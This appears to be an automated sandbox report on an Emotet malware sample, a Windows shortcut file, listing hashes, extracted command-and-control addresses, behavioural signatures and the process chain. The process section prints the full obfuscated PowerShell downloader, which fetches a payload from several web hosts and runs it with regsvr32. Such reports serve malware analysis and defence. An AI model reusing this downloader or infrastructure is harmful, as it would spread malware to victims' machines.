Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Resubmissions
06/09/2022, 13:38
220906-qxnn7adff7 1014/06/2022, 07:29
220614-jbbdeacfdk 1013/06/2022, 22:26
220613-2cyjfafdb8 1013/06/2022, 20:59
220613-zstjbaagap 10Analysis
-
max time kernel
130s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
14/06/2022, 07:29
Static task
static1
Behavioral task
behavioral1
Sample
UU3444499999999AA.lnk
Resource
win7-20220414-en
General
-
Target
UU3444499999999AA.lnk
-
Size
3KB
-
MD5
08205fbc8d439bb4dbded1b3b4146daa
-
SHA1
f07b89b0bb7691406f109e6be7d59551efa91fc7
-
SHA256
3e3b827cf8b350d18fc92feb1c7bafd89ca2239eb903bef27bdc06a41de98b57
-
SHA512
c1045c4ab9ce5e3fe0b2c13521b75e824b1501c626782aad55a20923d88ecdc9c0f28fd0b6f005dc5ea69b8af50bd7bb5963f389da55a4e7fc74fa8defbbc902
Malware Config
Extracted
emotet
101.50.0.91:8080
159.89.202.34:443
209.97.163.214:443
173.212.193.249:8080
159.65.88.10:8080
45.118.115.99:8080
82.165.152.127:8080
207.148.79.14:8080
41.73.252.195:443
196.218.30.83:443
103.75.201.2:443
64.227.100.222:8080
149.56.131.28:8080
103.43.75.120:443
188.44.20.25:443
185.4.135.165:8080
91.207.28.33:8080
110.232.117.186:8080
72.15.201.15:8080
45.176.232.124:443
46.55.222.11:443
163.44.196.120:8080
172.105.226.75:8080
5.9.116.246:8080
150.95.66.124:8080
94.23.45.86:4143
107.170.39.149:8080
209.126.98.206:8080
212.24.98.99:8080
167.172.253.162:8080
146.59.226.45:443
115.68.227.76:8080
164.68.99.3:8080
206.189.28.199:8080
186.194.240.217:443
158.69.222.101:443
172.104.251.154:8080
103.70.28.102:8080
45.186.16.18:443
51.254.140.238:7080
197.242.150.244:8080
51.161.73.194:443
201.94.166.162:443
160.16.142.56:8080
213.241.20.155:443
129.232.188.93:443
134.122.66.193:8080
45.235.8.30:8080
159.65.140.115:443
119.193.124.41:7080
151.106.112.196:8080
144.91.78.55:443
82.223.21.224:8080
183.111.227.137:8080
1.234.2.232:8080
153.126.146.25:7080
79.137.35.198:8080
103.132.242.26:8080
51.91.76.89:8080
37.187.115.122:8080
131.100.24.231:80
203.114.109.124:443
1.234.21.73:7080
Signatures
-
suricata: ET MALWARE W32/Emotet CnC Beacon 3
suricata: ET MALWARE W32/Emotet CnC Beacon 3
-
Blocklisted process makes network request 4 IoCs
flow pid Process 9 5044 powershell.exe 13 5044 powershell.exe 15 5044 powershell.exe 40 5044 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation cmd.exe -
Loads dropped DLL 2 IoCs
pid Process 3856 regsvr32.exe 2300 regsvr32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 5044 powershell.exe 5044 powershell.exe 3856 regsvr32.exe 3856 regsvr32.exe 2300 regsvr32.exe 2300 regsvr32.exe 2300 regsvr32.exe 2300 regsvr32.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 5044 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2880 wrote to memory of 5044 2880 cmd.exe 80 PID 2880 wrote to memory of 5044 2880 cmd.exe 80 PID 5044 wrote to memory of 3856 5044 powershell.exe 88 PID 5044 wrote to memory of 3856 5044 powershell.exe 88 PID 3856 wrote to memory of 2300 3856 regsvr32.exe 89 PID 3856 wrote to memory of 2300 3856 regsvr32.exe 89
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\UU3444499999999AA.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2880 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "&{'/ZIIDxaZ4eOrVrXwvO7wSOLQe/f4UxLlrO9bmR5Uq4eReEdw+a2fZRMSDRMsW+yRtA38AWvk';$Hkc='JlbmNlPSJTaWxlbnRseUNvbnRpbnVlIjskbGlua3M9KCJodHRwOi8vbmljb2xhc3Nwb3J0YWZvbGlvLmF0d2VicGFnZXMuY29tL2Nzcy94S0FLYXpDVE4vIiwiaHR0cDovL3d3dy5haGFuLm9yZy5way9jYXRhbG9ndWVzL3YzLyIsImh0dHA6Ly9ucmMtc29sdWNpb25lcy5jb20uYXIvY2dpLWJpbi9uOWIwQTlOM0pScks2TXkvIiwiaHR0cDovL3d3dy5hZ3JldHRvLmNvbS9UZW1wbGF0ZS9qRURZQ1ltOG50SnQwU3EvIiwiaHR0cHM6Ly9teWFubWFyY2hlZnMuY29tL3dwLWNvbnRlbnQvS3VHNFc3aC8iLCJodHRwOi8vd29vbGxvb21vb2xvby5ubC9jZ2ktYmluL3pJZHdOQzJkLyIpOyR0PSJlblBNTXZSbiI7JGQ9IiRlbnY6VE1QXC4uXCR0Ijtta2RpciAtZm9yY2UgJGQgfCBvdXQtbnVsbDtmb3JlYWNoICgkdSBpbiAkbGlua3MpIHt0cnkge0lXUiAkdSAtT3V0RmlsZSAkZFxLS0h3RUx3Y29YLnJLVTtSZWdzdnIzMi5leGUgIiRkXEtLSHdFTHdjb1gucktVIjticmVha30gY2F0Y2ggeyB9fQ==';$ZYCJ='IFdyaXRlLUhvc3QgInNBYlZTIjskUHJvZ3Jlc3NQcmVmZX';$ZYCJ=$ZYCJ+$Hkc;$EL=$ZYCJ;$gFtY=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($EL));$EL=$gFtY;iex($EL)}"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5044 -
C:\Windows\system32\regsvr32.exe"C:\Windows\system32\regsvr32.exe" C:\Users\Admin\AppData\Local\Temp\..\enPMMvRn\KKHwELwcoX.rKU3⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3856 -
C:\Windows\system32\regsvr32.exeC:\Windows\system32\regsvr32.exe "C:\Windows\system32\GjyHGvz\sqaZ.dll"4⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:2300
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
367KB
MD50f19b5561bf105e28894d6b0e6c9582d
SHA1399a6d4253402984c6712aeb6ffc7ede1f7e0fa6
SHA256f78ac98c6c2d5af1542c2516f26e6af6c0e186bca4a17592e8fb732a6dcf3af5
SHA5122c6ec08e13a5f9af4b78ea6a540c13f387f61b59a02ac2b058cc62921b8dd7d9d345424bb826dd8e0f6fe524bfb22bdcd52f0e97d48956a1d81da22896000e80
-
Filesize
367KB
MD50f19b5561bf105e28894d6b0e6c9582d
SHA1399a6d4253402984c6712aeb6ffc7ede1f7e0fa6
SHA256f78ac98c6c2d5af1542c2516f26e6af6c0e186bca4a17592e8fb732a6dcf3af5
SHA5122c6ec08e13a5f9af4b78ea6a540c13f387f61b59a02ac2b058cc62921b8dd7d9d345424bb826dd8e0f6fe524bfb22bdcd52f0e97d48956a1d81da22896000e80
-
Filesize
367KB
MD50f19b5561bf105e28894d6b0e6c9582d
SHA1399a6d4253402984c6712aeb6ffc7ede1f7e0fa6
SHA256f78ac98c6c2d5af1542c2516f26e6af6c0e186bca4a17592e8fb732a6dcf3af5
SHA5122c6ec08e13a5f9af4b78ea6a540c13f387f61b59a02ac2b058cc62921b8dd7d9d345424bb826dd8e0f6fe524bfb22bdcd52f0e97d48956a1d81da22896000e80